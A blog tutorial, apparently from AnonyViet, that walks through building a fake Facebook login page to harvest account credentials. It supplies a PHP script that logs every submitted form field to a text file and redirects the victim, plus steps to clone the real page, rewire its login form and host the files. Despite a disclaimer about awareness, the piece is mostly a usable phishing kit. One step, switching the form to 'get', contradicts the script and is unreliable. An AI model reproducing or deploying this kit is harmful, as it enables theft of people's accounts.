• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Instructions for Creating a Simple Phising Web

AnonyViet by AnonyViet
February 18, 2023
in Tips
0

What is Phishing?

Web Phising is a form of spoofing site to steal accounts

Join the channel Telegram belong to AnonyViet 👉 Link 👈

Today Anonyviet would like to guide you you create a phising website yourself (scam) simple as you like.
This article was written by me to help you gain more knowledge about web scam, phising.

From there, it helps you see how people create it, how to identify and prevent phishing sites, not recommended You use it for destructive purposes
Thank !

Prepare

  1. Hosting (You can register at free web hosting like hostinger.vn)

Let’s get to work!

Step 1

Create files “nick.php” on hosting, put the following code in and save

<?php
header("Location: http:// "); //nhập link các bạn muốn chuyển đến 
$handle = fopen("log.txt", "a");//nơi lưu tài khoản
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

How to Create a Simple Phising Web 7

Step 2

Open the website you want to fake (here I will give an example with Facebook page)
– You enter https://www.facebook.com right click select “save as…” or press the key combination “Ctrl + S” to save the code of the page to be faked.
Instructions for Creating a Simple Phising WebA dialog box appears, save with the file name “index” and choose “Save Entire Page”
How to Create a Simple Phising Web 9– After the download is complete, open the file “index.html” just downloaded

  • – Press the key combination “Ctrl + F” type in the search box “action=” press Enter
    How to Create a Simple Phising Web 10Edit the line “https://www.facebook.com/login.php?login_attempt=1&lwv=110” wall “nick.php“
  • Fix method=”post .”“ wall method=”get”

After editing the song can be like the picture
Instructions for Creating a Simple Phising Web 11After you have fixed it as shown, save the code again

Step 3

  • Upload files index.html Upload the hosting you just created above to your host.
  • Create files log.txt

Note

3 File index.html, nick.php, log.txt must be in the same directory

So you have successfully created Phising Facebook website once again, I repeat: Do not encourage actions that destroy others.

Anonyviet – Blue

The article achieved: 5/5 – (100 votes)

Previous Post

Instructions for using the black interface (Dark Mode) on Youtube

Next Post

Instructions for creating email signatures in HTML

AnonyViet

AnonyViet

Related Posts

Instructions on how to make money from personal Facebook
Tips

Instructions on how to make money from personal Facebook

May 2, 2026
How to add sliders to Facebook Stories to easily rewind videos
Tips

How to add sliders to Facebook Stories to easily rewind videos

April 21, 2026
How to change the default font on Windows 10
Tips

How to change the default font on Windows 10

April 13, 2026
5 tips for using a Browser to replace an App (helps save RAM, time and money)
Tips

5 tips for using a Browser to replace an App (helps save RAM, time and money)

April 13, 2026
How to make funny MeMe photos without Photoshop within 10 seconds
Tips

How to make funny MeMe photos without Photoshop within 10 seconds

April 11, 2026
How to quickly design your own Logo without Photoshop
Tips

How to quickly design your own Logo without Photoshop

April 10, 2026
Next Post
Instructions for creating email signatures in HTML

Instructions for creating email signatures in HTML

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Instructions on how to make money from personal Facebook

Instructions on how to make money from personal Facebook

May 2, 2026
Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

April 30, 2026
How to get 2 months of Super Duolingo for free worth 300k

How to get 2 months of Super Duolingo for free worth 300k

April 30, 2026
How to create a Face Sticker Collection using ChatGPT

How to create a Face Sticker Collection using ChatGPT

April 29, 2026
Instructions on how to make money from personal Facebook

Instructions on how to make money from personal Facebook

May 2, 2026
Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

April 30, 2026
How to get 2 months of Super Duolingo for free worth 300k

How to get 2 months of Super Duolingo for free worth 300k

April 30, 2026
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Instructions on how to make money from personal Facebook

Instructions on how to make money from personal Facebook

May 2, 2026
Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

Create an avatar to celebrate April 30 with a beautiful red flag shirt with yellow stars

April 30, 2026
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply